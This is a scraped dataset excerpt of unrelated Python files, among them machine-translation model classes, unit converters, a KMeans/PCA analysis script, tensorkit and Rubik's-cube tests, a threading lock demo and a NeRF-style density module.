content stringlengths 0 1.05M | origin stringclasses 2
values | type stringclasses 2
values |
|---|---|---|
from django.apps import AppConfig
class KoperationConfig(AppConfig):
name = 'koperation'
| nilq/baby-python | python |
from scraper.scraper import Scraper
from scraper.template import Template
def start_scraping():
job_name = input('Enter job name: ')
place = input('Enter place: ')
radius = int(input('Enter radius: '))
scraper = Scraper(job_name, place, radius)
print(f'URL: {scraper.page.url}, Place: {scraper.location}, Job name: \
{scraper.job_name}\n')
template = Template(scraper.offers, scraper.number_of_offers)
if __name__ == '__main__':
start_scraping()
| nilq/baby-python | python |
class Initializer:
def __init__(self, interval):
self.interval = interval
| nilq/baby-python | python |
from django.apps import AppConfig
class RatingsConfig(AppConfig):
name = 'authors.apps.ratings'
| nilq/baby-python | python |
import torch
import torch.nn as nn
from torch.autograd import Variable
import onmt.modules
class Encoder(nn.Module):
def __init__(self, opt, dicts):
self.layers = opt.layers
self.num_directions = 2 if opt.brnn else 1
assert opt.rnn_size % self.num_directions == 0
self.hidden_size = opt.rnn_size // self.num_directions
inputSize = opt.word_vec_size
super(Encoder, self).__init__()
self.word_lut = nn.Embedding(dicts.size(),
opt.word_vec_size,
padding_idx=onmt.Constants.PAD)
self.rnn = nn.LSTM(inputSize, self.hidden_size,
num_layers=opt.layers,
dropout=opt.dropout,
bidirectional=opt.brnn)
# self.rnn.bias_ih_l0.data.div_(2)
# self.rnn.bias_hh_l0.data.copy_(self.rnn.bias_ih_l0.data)
if opt.pre_word_vecs_enc is not None:
pretrained = torch.load(opt.pre_word_vecs_enc)
self.word_lut.weight.copy_(pretrained)
def forward(self, input, hidden=None):
batch_size = input.size(0) # batch first for multi-gpu compatibility
emb = self.word_lut(input).transpose(0, 1)
if hidden is None:
h_size = (self.layers * self.num_directions, batch_size, self.hidden_size)
h_0 = Variable(emb.data.new(*h_size).zero_(), requires_grad=False)
c_0 = Variable(emb.data.new(*h_size).zero_(), requires_grad=False)
hidden = (h_0, c_0)
outputs, hidden_t = self.rnn(emb, hidden)
return hidden_t, outputs
class StackedLSTM(nn.Module):
def __init__(self, num_layers, input_size, rnn_size, dropout):
super(StackedLSTM, self).__init__()
self.dropout = nn.Dropout(dropout)
self.num_layers = num_layers
for i in range(num_layers):
layer = nn.LSTMCell(input_size, rnn_size)
self.add_module('layer_%d' % i, layer)
input_size = rnn_size
def forward(self, input, hidden):
h_0, c_0 = hidden
h_1, c_1 = [], []
for i in range(self.num_layers):
layer = getattr(self, 'layer_%d' % i)
h_1_i, c_1_i = layer(input, (h_0[i], c_0[i]))
input = h_1_i
if i != self.num_layers:
input = self.dropout(input)
h_1 += [h_1_i]
c_1 += [c_1_i]
h_1 = torch.stack(h_1)
c_1 = torch.stack(c_1)
return input, (h_1, c_1)
class Decoder(nn.Module):
def __init__(self, opt, dicts):
self.layers = opt.layers
self.input_feed = opt.input_feed
input_size = opt.word_vec_size
if self.input_feed:
input_size += opt.rnn_size
super(Decoder, self).__init__()
self.word_lut = nn.Embedding(dicts.size(),
opt.word_vec_size,
padding_idx=onmt.Constants.PAD)
self.rnn = StackedLSTM(opt.layers, input_size, opt.rnn_size, opt.dropout)
self.attn = onmt.modules.GlobalAttention(opt.rnn_size)
self.dropout = nn.Dropout(opt.dropout)
# self.rnn.bias_ih.data.div_(2)
# self.rnn.bias_hh.data.copy_(self.rnn.bias_ih.data)
self.hidden_size = opt.rnn_size
if opt.pre_word_vecs_enc is not None:
pretrained = torch.load(opt.pre_word_vecs_dec)
self.word_lut.weight.copy_(pretrained)
def forward(self, input, hidden, context, init_output):
emb = self.word_lut(input).transpose(0, 1)
batch_size = input.size(0)
h_size = (batch_size, self.hidden_size)
output = Variable(emb.data.new(*h_size).zero_(), requires_grad=False)
# n.b. you can increase performance if you compute W_ih * x for all
# iterations in parallel, but that's only possible if
# self.input_feed=False
outputs = []
output = init_output
for i, emb_t in enumerate(emb.chunk(emb.size(0), dim=0)):
emb_t = emb_t.squeeze(0)
if self.input_feed:
emb_t = torch.cat([emb_t, output], 1)
output, h = self.rnn(emb_t, hidden)
output, attn = self.attn(output, context.t())
output = self.dropout(output)
outputs += [output]
outputs = torch.stack(outputs)
return outputs.transpose(0, 1), h, attn
class NMTModel(nn.Module):
def __init__(self, encoder, decoder, generator):
super(NMTModel, self).__init__()
self.encoder = encoder
self.decoder = decoder
self.generator = generator
self.generate = False
def set_generate(self, enabled):
self.generate = enabled
def make_init_decoder_output(self, context):
batch_size = context.size(1)
h_size = (batch_size, self.decoder.hidden_size)
return Variable(context.data.new(*h_size).zero_(), requires_grad=False)
def _fix_enc_hidden(self, h):
# the encoder hidden is (layers*directions) x batch x dim
# we need to convert it to layers x batch x (directions*dim)
if self.encoder.num_directions == 2:
return h.view(h.size(0) // 2, 2, h.size(1), h.size(2)) \
.transpose(1, 2).contiguous() \
.view(h.size(0) // 2, h.size(1), h.size(2) * 2)
else:
return h
def forward(self, input):
src = input[0]
tgt = input[1][:, :-1] # exclude last target from inputs
enc_hidden, context = self.encoder(src)
init_output = self.make_init_decoder_output(context)
enc_hidden = (self._fix_enc_hidden(enc_hidden[0]),
self._fix_enc_hidden(enc_hidden[1]))
out, dec_hidden, _attn = self.decoder(tgt, enc_hidden, context, init_output)
if self.generate:
out = self.generator(out)
return out
| nilq/baby-python | python |
import torch.utils.data as data
from torchvision import transforms
from .cifar import CorruptionDataset, cifar_transform, imagenet_transform
from .visda import VisDaTest, visda_test_transforms
from .adversarial import ImagenetAdversarial, imageneta_transforms
from .randaugment import RandAugment
from .augmix import AugMix
class WrapperDataset(data.Dataset):
def __init__(self, dataset, augmentations, transforms=None, multi_out=True):
super().__init__()
self.dataset = dataset
self.transforms = transforms
self.augmentations = augmentations if transforms else lambda *args: augmentations(args[0])
self.multi_out = multi_out
def __getitem__(self, index):
x, y = self.dataset[index]
if self.multi_out:
im_tuple = (self.transforms(x), self.augmentations(x), self.augmentations(x))
else:
im_tuple = (self.augmentations(x), )
return im_tuple, y
def __len__(self):
return len(self.dataset)
def get_dataset(dataset, augmentation, corruption=None, level=None, **aug_args):
if dataset == 'visda':
dataset = VisDaTest()
transform = visda_test_transforms
elif dataset in ['imagenet', 'cifar100', 'cifar10']:
transform = imagenet_transform if dataset == 'imagenet' else cifar_transform
dataset = CorruptionDataset(dataset, corruption=corruption, level=level)
elif dataset == 'imageneta':
transform = imageneta_transforms
dataset = ImagenetAdversarial()
if augmentation.lower() == 'randaugment':
augmentation = transforms.Compose([RandAugment(**aug_args), transform])
elif augmentation.lower() == 'augmix':
augmentation = AugMix(base_transforms=transform, **aug_args)
return WrapperDataset(dataset, augmentations=augmentation, transforms=transform)
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
"""
Python Collection Of Functions.
Package with collection of small useful functions.
Bytes calculator
"""
def bytes2human(size, *, unit="", precision=2, base=1024):
"""
Convert number in bytes to human format.
Arguments:
size (int): bytes to be converted
Keyword arguments (opt):
unit (str): If it will convert bytes to a specific unit
'KB', 'MB', 'GB', 'TB', 'PB', 'EB'
precision (int): number of digits after the decimal point
base (int): 1000 - for decimal base
1024 - for binary base (it is the default)
Returns:
(int): number
(str): unit ('Bytes', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB']
Example:
>>> bytes2human(10)
('10.00', 'Bytes')
>>> bytes2human(2048)
('2.00', 'KB')
>>> bytes2human(27273042329)
('25.40', 'GB')
>>> bytes2human(27273042329, precision=1)
('25.4', 'GB')
>>> bytes2human(27273042329, unit='MB')
('26009.60', 'MB')
"""
# validate parameters
if not isinstance(precision, int):
raise ValueError("precision is not a number")
if not isinstance(base, int):
raise ValueError("base is not a number")
try:
num = float(size)
except ValueError:
raise ValueError("value is not a number")
suffix = ["Bytes", "KB", "MB", "GB", "TB", "PB", "EB", "ZB"]
# If it needs to convert bytes to a specific unit
if unit:
try:
num = num / base ** suffix.index(unit)
except ValueError:
raise ValueError("Error: unit must be {}".format(", ".join(suffix[1:])))
return "{0:.{prec}f}".format(num, prec=precision), unit
# Calculate the greatest unit for the that size
for counter, suffix_unit in enumerate(suffix):
if num < base:
return "{0:.{prec}f}".format(num, prec=precision), suffix_unit
if counter == len(suffix) - 1:
raise ValueError("value greater than the highest unit")
num /= base
def human2bytes(size, unit, *, precision=2, base=1024):
"""
Convert size from human to bytes.
Arguments:
size (int): number
unit (str): converts from this unit to bytes
'KB', 'MB', 'GB', 'TB', 'PB', 'EB'
Keyword arguments (opt):
precision (int): number of digits after the decimal point
default is 2
base (int): 1000 - for decimal base
1024 - for binary base (it is the default)
Returns:
(int) number in bytes
Example:
>>> human2bytes(10, 'GB')
'10737418240.00'
>>> human2bytes(10, 'GB', precision=0)
'10737418240'
>>> human2bytes(10, 'PB')
'11258999068426240.00'
"""
dic_power = {
"KB": base,
"MB": base ** 2,
"GB": base ** 3,
"TB": base ** 4,
"PB": base ** 5,
"EB": base ** 6,
"ZB": base ** 7,
}
if unit not in dic_power:
raise ValueError(
"invalid unit. It must be {}".format(", ".join(dic_power.keys()))
)
try:
num_bytes = float(size) * int(dic_power[unit])
except ValueError:
raise ValueError("value is not a number")
return "{0:.{prec}f}".format(num_bytes, prec=precision)
def bandwidth_converter(
number, *, from_unit, to_unit, from_time="seconds", to_time="seconds"
):
"""
Bandwidth Calculator.
Convert data rate from one unit to another.
Arguments:
number (int): number to be converted
Keyword arguments:
from_unit (str): convert from this data unit. Example:
(bps, Kbps, Mbps, Gbps... KB, KiB, MB, MiB...)
to_unit (str): convert to this data unit. Example:
(bps, Kbps, Mbps, Gbps... KB, KiB, MB, MiB...)
Keyword arguments (opt):
from_time (str): Specify the time frame used in from_unit
(seconds, minutes, hours, days, months)
default: seconds
to_time (str): Specify the time frame used in to_unit
(seconds, minutes, hours, days, months)
default: seconds
bps, Kbps, Mbps, Gbps... = decimal base = 1000^n
KB, MB, GB, TB... = decimal base = 1000^n
KiB, MiB, GiB, TiB... = binary base = 1024^n
References:
- https://en.wikipedia.org/wiki/Units_of_information
- https://physics.nist.gov/cuu/Units/binary.html
Returns: tuple
(number_converted, to_unit/to_time)
Example:
>>> bandwidth_converter(100, from_unit="Mbps", to_unit="MB")
(12.5, 'MB/seconds')
>>> bandwidth_converter(100, from_unit="Mbps", to_unit="GB", to_time="hours")
(45.0, 'GB/hours')
>>> bandwidth_converter(1, from_unit="Gbps", to_unit="MB")
(125.0, 'MB/seconds')
>>> bandwidth_converter(10, from_unit="Gbps", to_unit="GB")
(1.25, 'GB/seconds')
>>> bandwidth_converter(10, from_unit="Gbps", to_unit="TB", to_time="hours")
(4.5, 'TB/hours')
>>> bandwidth_converter(10, from_unit="GB", to_unit="Gbps")
(80.0, 'Gbps/seconds')
>>> Convert 2.25 GB per hours to Mbps # doctest: +SKIP
>>> bandwidth_converter(2.25, from_unit="GB", from_time="hours", to_unit="Mbps", to_time="seconds") # noqa
(5.0, 'Mbps/seconds')
"""
unit_power = {
"bps": 1,
"Kbps": 1000,
"Mbps": 1000 ** 2,
"Gbps": 1000 ** 3,
"Tbps": 1000 ** 4,
"Pbps": 1000 ** 5,
"Ebps": 1000 ** 6,
"Bytes": 1,
"KB": 1000,
"MB": 1000 ** 2,
"GB": 1000 ** 3,
"TB": 1000 ** 4,
"PB": 1000 ** 5,
"EB": 1000 ** 6,
"KiB": 1024,
"MiB": 1024 ** 2,
"GiB": 1024 ** 3,
"TiB": 1024 ** 4,
"PiB": 1024 ** 5,
"EiB": 1024 ** 6,
}
time_in_sec = {
"seconds": 1,
"minutes": 60,
"hours": 3600,
"days": 3600 * 24,
"months": 3600 * 24 * 30,
}
if from_unit not in unit_power or to_unit not in unit_power:
raise ValueError(
"invalid unit. It must be {}".format(", ".join(unit_power.keys()))
)
if from_time not in time_in_sec or to_time not in time_in_sec:
raise ValueError(
"invalid time. It must be {}".format(", ".join(time_in_sec.keys()))
)
# Convert input number to bps
bps = (float(number) * int(unit_power[from_unit])) / time_in_sec[from_time]
if not from_unit.endswith("bps"):
bps = bps * 8
# to_unit is bits or bytes
new_unit = bps if to_unit.endswith("bps") else bps / 8
# Convert to new unit
new_unit = (new_unit / unit_power[to_unit]) * time_in_sec[to_time]
return new_unit, "{}/{}".format(to_unit, to_time)
# vim: ts=4
| nilq/baby-python | python |
import numpy as np
import pandas as pd
from sklearn import preprocessing
import matplotlib.pyplot as plt
import matplotlib
PLOT_TYPE_TEXT = False # For indices
PLOT_VECTORS = True # For original features in P.C.-Space
matplotlib.style.use('ggplot') # Look Pretty
c = ['red', 'green', 'blue', 'orange', 'yellow', 'brown']
def drawVectors(transformed_features, components_, columns, plt):
num_columns = len(columns)
# This function will project the original feature onto the principal component feature-space,
# Scaling the principal components by the max value in
# the transformed set belonging to that component
xvector = components_[0] * max(transformed_features[:,0])
yvector = components_[1] * max(transformed_features[:,1])
# Sorting each column by its length.
import math
important_features = { columns[i] : math.sqrt(xvector[i]**2 + yvector[i]**2) for i in range(num_columns) }
important_features = sorted(zip(important_features.values(), important_features.keys()), reverse=True)
print "Projected Features by importance:\n", important_features
ax = plt.axes()
for i in range(num_columns):
# Using an arrow to project each original feature as a
# labeled vector on the principal component axes
plt.arrow(0, 0, xvector[i], yvector[i], color='b', width=0.0005, head_width=0.02, alpha=0.75, zorder=600000)
plt.text(xvector[i]*1.2, yvector[i]*1.2, list(columns)[i], color='b', alpha=0.75, zorder=600000)
return ax
def doPCA(data, dimensions=2):
from sklearn.decomposition import PCA
import sklearn
print sklearn.__version__
model = PCA(n_components=dimensions, svd_solver='randomized', random_state=7)
model.fit(data)
return model
def doKMeans(data, clusters=0):
from sklearn.cluster import KMeans
kmeans = KMeans(n_clusters = clusters)
kmeans.fit(data)
model = kmeans.predict(data)
model = kmeans
return model.cluster_centers_, model.labels_
import os
os.chdir("Datasets")
df = pd.read_csv("Wholesale customers data.csv", sep=',', header = 0)
# Setting Nans to 0
df.fillna(0)
df.drop(['Channel','Region'], axis = 1, inplace = True)
df.plot.hist()
# Removing top 5 and bottom 5 samples for each column to reduce big gaps
drop = {}
for col in df.columns:
# Bottom 5
sort = df.sort_values(by=col, ascending=True)
if len(sort) > 5: sort=sort[:5]
for index in sort.index: drop[index] = True # Just store the index once
# Top 5
sort = df.sort_values(by=col, ascending=False)
if len(sort) > 5: sort=sort[:5]
for index in sort.index: drop[index] = True # Just store the index once
#
# Dropping rows by index.
print "Dropping {0} Outliers...".format(len(drop))
df.drop(inplace=True, labels=drop.keys(), axis=0)
#
# Un-commenting one line at a time before running the code
T = preprocessing.StandardScaler().fit_transform(df)
#T = preprocessing.MinMaxScaler().fit_transform(df)
#T = preprocessing.MaxAbsScaler().fit_transform(df)
#T = preprocessing.Normalizer().fit_transform(df)
T = df # No Change
# KMeans
n_clusters = 3
centroids, labels = doKMeans(T, n_clusters)
#
# Printing out the centroids.
print(centroids)
# Projecting the centroids and samples into the new 2D feature space
display_pca = doPCA(T)
T = display_pca.transform(T)
CC = display_pca.transform(centroids)
# Visualizing all the samples and giving them the color of their cluster label
fig = plt.figure()
ax = fig.add_subplot(111)
if PLOT_TYPE_TEXT:
# Plotting the index of the sample
for i in range(len(T)): ax.text(T[i,0], T[i,1], df.index[i], color=c[labels[i]], alpha=0.75, zorder=600000)
ax.set_xlim(min(T[:,0])*1.2, max(T[:,0])*1.2)
ax.set_ylim(min(T[:,1])*1.2, max(T[:,1])*1.2)
else:
# Plotting a regular scatter plot
sample_colors = [ c[labels[i]] for i in range(len(T)) ]
ax.scatter(T[:, 0], T[:, 1], c=sample_colors, marker='o', alpha=0.2)
# Plotting the Centroids as X's
ax.scatter(CC[:, 0], CC[:, 1], marker='x', s=169, linewidths=3, zorder=1000, c=c)
for i in range(len(centroids)): ax.text(CC[i, 0], CC[i, 1], str(i), zorder=500010, fontsize=18, color=c[i])
# Displaying the feature vectors
if PLOT_VECTORS: drawVectors(T, display_pca.components_, df.columns, plt)
# Adding the cluster label back into the dataframe
df['label'] = pd.Series(labels, index=df.index)
print df
plt.show()
| nilq/baby-python | python |
from phenotype.Core.Auxiliary import (
__apply__,
__identity__,
)
def Lookup(key_func=__identity__,val_func=__identity__): return __apply__(key_func,val_func)
class Hasher(dict):
''' '''
__key_value_function__ = Lookup(id)
__key__ = id
@classmethod
def __key_value__(cls, item):
''' '''
return cls.__key_value_function__(item)
def __init__(self, *items):
''' '''
super().__init__( map( self.__key_value_function__, items ) )
def __len__(self):
''' '''
return len(self._mapping)
def __contains__(self, item):
''' '''
return self.__key__(item) in self._mapping.keys()
def __iter__(self):
''' '''
yield from self._mapping.items()
def __getitem__(self, item):
''' '''
hashed = self.__key__(item)
return self.get(hashed,None)
def __call__(self, item):
''' '''
hashed = self.__key__(item)
self._mapping[hashed] = item
return hashed
| nilq/baby-python | python |
import math
import unittest
from typing import *
import mock
import pytest
import tensorkit as tk
from tensorkit import tensor as T
from tensorkit.distributions import Categorical, FlowDistribution, UnitNormal
from tensorkit.distributions.utils import copy_distribution
from tensorkit.flows import ReshapeFlow, ActNorm
from tensorkit.tensor import Tensor, float_scalar_like, int_range
from tests.helper import *
class _MyFlow(tk.flows.Flow):
def _transform(self,
input: Tensor,
input_log_det: Optional[Tensor],
inverse: bool,
compute_log_det: bool
) -> Tuple[Tensor, Optional[Tensor]]:
if inverse:
output = input * 2.0 + 1
event_ndims = self.x_event_ndims
else:
output = (input - 1.0) * 0.5
event_ndims = self.y_event_ndims
if compute_log_det:
if inverse:
output_log_det = float_scalar_like(-math.log(2.), output)
else:
output_log_det = float_scalar_like(math.log(2.), output)
for axis in int_range(-event_ndims, 0):
output_log_det = output_log_det * output.shape[axis]
if input_log_det is not None:
output_log_det = output_log_det + input_log_det
else:
output_log_det: Optional[Tensor] = None
return output, output_log_det
def check_flow_distribution(ctx,
distribution,
flow):
min_event_ndims = flow.get_y_event_ndims()
max_event_ndims = (distribution.value_ndims +
(flow.get_y_event_ndims() - flow.get_x_event_ndims()))
def fn(event_ndims, reparameterized, validate_tensors):
# construct the instance
kwargs = {}
if reparameterized is not None:
kwargs['reparameterized'] = reparameterized
else:
reparameterized = distribution.reparameterized
if event_ndims is not None:
kwargs['event_ndims'] = event_ndims
else:
event_ndims = flow.get_y_event_ndims()
if validate_tensors is not None:
kwargs['validate_tensors'] = validate_tensors
else:
validate_tensors = distribution.validate_tensors
d = FlowDistribution(distribution, flow, **kwargs)
# check the instance
def log_prob_fn(t):
log_px = distribution.log_prob(t.transform_origin.tensor,
group_ndims=0)
y, log_det = flow(t.transform_origin.tensor) # y and log |dy/dx|
assert_allclose(y, t.tensor, atol=1e-4, rtol=1e-6)
ctx.assertEqual(
T.rank(log_det),
T.rank(log_px) - (flow.get_x_event_ndims() - distribution.event_ndims)
)
return -log_det + T.reduce_sum(
log_px, T.int_range(
-(flow.get_x_event_ndims() - distribution.event_ndims),
0
)
)
check_distribution_instance(
ctx=ctx,
d=d,
event_ndims=event_ndims,
batch_shape=distribution.batch_shape[: max_event_ndims - event_ndims],
min_event_ndims=min_event_ndims,
max_event_ndims=max_event_ndims,
log_prob_fn=log_prob_fn,
transform_origin_distribution=distribution,
transform_origin_group_ndims=flow.get_x_event_ndims() - distribution.event_ndims,
# other attributes
base_distribution=distribution,
flow=flow,
dtype=distribution.dtype,
continuous=distribution.continuous,
reparameterized=reparameterized,
validate_tensors=validate_tensors,
)
for event_ndims in (None,
min_event_ndims,
(min_event_ndims + max_event_ndims) // 2,
max_event_ndims):
fn(event_ndims, None, None)
for reparameterized in (None, True, False):
fn(None, reparameterized, None)
for validate_tensors in (None, True, False):
fn(None, None, validate_tensors)
class FlowDistributionTestCase(TestCase):
def test_FlowDistribution(self):
check_flow_distribution(
self,
UnitNormal([], event_ndims=0),
_MyFlow(x_event_ndims=0, y_event_ndims=0, explicitly_invertible=True),
)
check_flow_distribution(
self,
UnitNormal([2, 3, 4], event_ndims=0),
_MyFlow(x_event_ndims=0, y_event_ndims=0, explicitly_invertible=True),
)
check_flow_distribution(
self,
UnitNormal([2, 3, 4], event_ndims=0),
ActNorm(4),
)
check_flow_distribution(
self,
UnitNormal([2, 3, 4], event_ndims=1),
ReshapeFlow([-1], [-1, 1]),
)
check_flow_distribution(
self,
UnitNormal([2, 3, 4], event_ndims=1),
ReshapeFlow([-1, 1], [-1]),
)
# errors in constructor
with pytest.raises(TypeError,
match='`distribution` is not an instance of '
'`Distribution`'):
_ = FlowDistribution(object(), ActNorm(3))
with pytest.raises(TypeError, match='`flow` is not a flow'):
_ = FlowDistribution(UnitNormal([3]), object())
with pytest.raises(ValueError,
match='cannot be transformed by a flow, because '
'it is not continuous'):
_ = FlowDistribution(Categorical(logits=[0., 1., 2.]), ActNorm(3))
with pytest.raises(ValueError,
match='cannot be transformed by a flow, because '
'its `dtype` is not floating point'):
normal = UnitNormal([3])
normal.dtype = T.int32
_ = FlowDistribution(normal, ActNorm(3))
with pytest.raises(ValueError,
match='`distribution.event_ndims <= flow.'
'x_event_ndims <= distribution.value_ndims` '
'is not satisfied'):
_ = FlowDistribution(UnitNormal([2, 3, 4], event_ndims=2),
ActNorm(4))
with pytest.raises(ValueError,
match='`distribution.event_ndims <= flow.'
'x_event_ndims <= distribution.value_ndims` '
'is not satisfied'):
_ = FlowDistribution(UnitNormal([2, 3, 4], event_ndims=2),
_MyFlow(x_event_ndims=4, y_event_ndims=4,
explicitly_invertible=True))
with pytest.raises(ValueError,
match='`event_ndims` out of range: .* '
'minimum allowed value is 2, .* '
'maximum allowed value is 4'):
_ = FlowDistribution(
UnitNormal([2, 3, 4]), ReshapeFlow([-1], [-1, 1]), event_ndims=1)
with pytest.raises(ValueError,
match='`event_ndims` out of range: .* '
'minimum allowed value is 2, .* '
'maximum allowed value is 4'):
_ = FlowDistribution(
UnitNormal([2, 3, 4]), ReshapeFlow([-1], [-1, 1]), event_ndims=5)
def test_copy(self):
normal = UnitNormal([2, 3, 5], dtype=T.float64, validate_tensors=True)
flow = ActNorm(5)
distrib = FlowDistribution(normal, flow)
self.assertEqual(distrib.event_ndims, 1)
self.assertTrue(distrib.reparameterized)
self.assertTrue(distrib.validate_tensors)
with mock.patch('tensorkit.distributions.flow.copy_distribution',
wraps=copy_distribution) as f_copy:
distrib2 = distrib.copy(event_ndims=2, reparameterized=False,
validate_tensors=False)
self.assertIsInstance(distrib2, FlowDistribution)
self.assertIs(distrib2.flow, flow)
self.assertIsInstance(distrib2.base_distribution, UnitNormal)
self.assertEqual(distrib2.reparameterized, False)
self.assertEqual(distrib2.event_ndims, 2)
self.assertFalse(distrib2.validate_tensors)
self.assertEqual(f_copy.call_args, ((), {
'cls': FlowDistribution,
'base': distrib,
'attrs': (('distribution', '_base_distribution'), 'flow',
'reparameterized', 'event_ndims', 'validate_tensors'),
'overrided_params': {'event_ndims': 2,
'reparameterized': False,
'validate_tensors': False},
}))
| nilq/baby-python | python |
import toml
import argparse
import numpy as np
from scipy.stats import entropy
from pom import POM
from sample_script import get_points_covered_by_lidar_config
def evaluate(map, pom_params, lidar_params, config):
points = get_points_covered_by_lidar_config(
pom_params, lidar_params, config, lidar_params['lidar_nos']
)
H_entropy = 0.0 # -plogp-(1-p)log(1-p)
total_entropy = 0.0
for x in map:
for xy in x:
for xyz in xy:
if xyz == 0.0 or xyz == 1:
continue
total_entropy += entropy([1 - xyz, xyz])
for point in range(len(points)):
p = map[points[point]]
if p == 0.0 or p == 1:
continue
H_entropy += entropy([1-p,p])
return H_entropy, total_entropy, total_entropy - H_entropy
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-p','--params', type=str, default="multihyper.toml", help="Params")
parser.add_argument('-c','--configuration', type=str, default="config.toml", help="Configuration")
args = parser.parse_args()
params = toml.load(args.params)
configs = toml.load(args.configuration)['config']
pom_car, num_valid_frames_car = POM(
random=True, pom_params=params["pom"], lidar_params=params["lidar"]
).create_data_from_logs(
"./routes/square/vehicle"
)
print(111)
pom_car = pom_car.astype(float) / num_valid_frames_car
pom_ped, num_valid_frames_ped = POM(
random=True, pom_params=params["pom"], lidar_params=params["lidar"]
).create_data_from_logs(
"./routes/square/pedestrian"
)
pom_ped = pom_ped.astype(float) / num_valid_frames_ped
pom_cyc, num_valid_frames_cyc = POM(
random=True, pom_params=params["pom"], lidar_params=params["lidar"]
).create_data_from_logs(
"./routes/square/cyclist"
)
pom_cyc = pom_cyc.astype(float) / num_valid_frames_cyc
type = ['square', 'center', 'line', 'pyramid', 'trapezoid', 'line_roll', 'pyramid_roll',
'pyramid_pitch']
pom_list = [('car', pom_car), ('ped', pom_ped), ('cyc', pom_cyc)]
for key, config in configs.items():
for pom in pom_list:
H_entropy, total_entropy, IG = evaluate(pom[1], params['pom'], params['lidar'], config)
print(
f"Key {type[int(key)]}, {pom[0]}: H_entropy {H_entropy}, total_entropy {total_entropy}, IG {IG}") | nilq/baby-python | python |
from cubelang.actions import Action
from cubelang.cube import Cube
from cubelang.orientation import Orientation, Side, Color
from cubelang.cli.cube_builder import apply_side, CubeBuilder
from pytest import raises
from unittest import mock
import pytest
import string
import argparse
from typing import List
class TestApplySide:
orientation = Orientation(Side.RIGHT, Side.BOTTOM)
def test_apply_side(self):
cube = Cube((2, 2, 2))
colors = [[Color.WHITE, Color.RED], [Color.ORANGE, Color.GREEN]]
apply_side(cube, self.orientation, colors)
actual_colors = [[cube.get_side(self.orientation).colors[i, j] for j in [0, 1]] for i in [0, 1]]
assert colors == actual_colors
def test_wrong_columns(self):
cube = Cube((2, 2, 2))
colors = [[Color.WHITE, Color.RED, Color.BLUE], [Color.ORANGE, Color.GREEN, Color.BLUE]]
with raises(argparse.ArgumentTypeError) as e:
apply_side(cube, self.orientation, colors)
assert str(e.value) == "Incorrect number of columns"
def test_wrong_lines(self):
cube = Cube((2, 2, 2))
colors = [[Color.WHITE, Color.RED]]
with raises(argparse.ArgumentTypeError) as e:
apply_side(cube, self.orientation, colors)
assert str(e.value) == "Incorrect number of lines"
class MockAction (Action):
def __init__(self, results: List[str], name: str):
self.results = results
self.name = name
def perform(self, cube: Cube, orientation: Orientation) -> Orientation:
self.results.append(self.name)
return Orientation(Side.LEFT, Side.RIGHT)
class TestBuilder:
def test_create(self):
builder = CubeBuilder((2, 2, 2))
cube, orientation = builder.get()
assert cube.shape == (2, 2, 2)
assert orientation.top == Side.TOP
assert orientation.front == Side.FRONT
@mock.patch("cubelang.cli.cube_builder.apply_side")
@pytest.mark.parametrize("side, exp_orientation", [
(Side.FRONT, Orientation(Side.FRONT, Side.TOP)),
(Side.LEFT, Orientation(Side.LEFT, Side.TOP)),
(Side.RIGHT, Orientation(Side.RIGHT, Side.TOP)),
(Side.BACK, Orientation(Side.BACK, Side.TOP)),
(Side.TOP, Orientation(Side.TOP, Side.BACK)),
(Side.BOTTOM, Orientation(Side.BOTTOM, Side.FRONT))
])
def test_side(self, apply_side_fn, side, exp_orientation):
builder = CubeBuilder((2, 2, 2))
builder.side(side, [])
apply_side_fn.assert_called_once_with(builder.cube, exp_orientation, [])
def test_scramble(self):
result = []
actions = [MockAction(result, string.ascii_uppercase[i]) for i in range(10)]
builder = CubeBuilder((2, 2, 2))
builder.scramble(actions)
_, orientation = builder.get()
assert orientation == Orientation(Side.LEFT, Side.RIGHT)
assert result == list("ABCDEFGHIJ")
| nilq/baby-python | python |
"""
线程锁-互斥锁
为什么要使用线程锁分析:https://blog.csdn.net/JackLiu16/article/details/81267176
互斥锁运行顺序分析:https://blog.csdn.net/weixin_40481076/article/details/101594705
"""
import threading,time
#实例化一个互斥锁对象
lock = threading.Lock()
def run():
lock.acquire() #获取锁
print(threading.current_thread().getName(),time.ctime())
time.sleep(5)
lock.release() #释放锁
for _ in range(10):
t = threading.Thread(target=run)
t.start()
| nilq/baby-python | python |
import FWCore.ParameterSet.Config as cms
from RecoBTag.Skimming.btagMC_QCD_800_1000_cfi import *
btagMC_QCD_800_1000Path = cms.Path(btagMC_QCD_800_1000)
| nilq/baby-python | python |
def getLocation(config):
config['serverType']="regularExperiment"
config['serverPort']=2345
config['webSocketPort']=3456
ip="localhost"
config["domain"]="http://"+ip+":"+str(config['serverPort'])
config["websocketURL"]="ws://"+ip+":"+str(config['webSocketPort'])
return config | nilq/baby-python | python |
import torch.nn as nn
import torch
class Density(nn.Module):
def __init__(self, params_init={}):
super().__init__()
for p in params_init:
param = nn.Parameter(torch.tensor(params_init[p]))
setattr(self, p, param)
def forward(self, sdf, beta=None):
return self.density_func(sdf, beta=beta)
class LaplaceDensity(Density): # alpha * Laplace(loc=0, scale=beta).cdf(-sdf)
def __init__(self, params_init={}, beta_min=0.0001):
super().__init__(params_init=params_init)
self.beta_min = torch.tensor(beta_min).cuda()
def density_func(self, sdf, beta=None):
if beta is None:
beta = self.get_beta()
alpha = 1 / beta
return alpha * (0.5 + 0.5 * sdf.sign() * torch.expm1(-sdf.abs() / beta))
def get_beta(self):
beta = self.beta.abs() + self.beta_min
return beta
class AbsDensity(Density): # like NeRF++
def density_func(self, sdf, beta=None):
return torch.abs(sdf)
class SimpleDensity(Density): # like NeRF
def __init__(self, params_init={}, noise_std=1.0):
super().__init__(params_init=params_init)
self.noise_std = noise_std
def density_func(self, sdf, beta=None):
if self.training and self.noise_std > 0.0:
noise = torch.randn(sdf.shape).cuda() * self.noise_std
sdf = sdf + noise
return torch.relu(sdf)
| nilq/baby-python | python |
#!/usr/bin/env python3
import matplotlib.pylab as plt
import numpy as np
from astropy import units as u
from ctapipe.io import event_source
from ctapipe.utils import datasets
from ctapipe.visualization import ArrayDisplay
if __name__ == "__main__":
plt.figure(figsize=(9.5, 8.5))
# load up a single event, so we can get the subarray info:
source = event_source(
datasets.get_dataset_path("gamma_test_large.simtel.gz"), max_events=1,
)
event = next(iter(source))
# display the array
subarray = source.subarray
ad = ArrayDisplay(subarray, tel_scale=3.0)
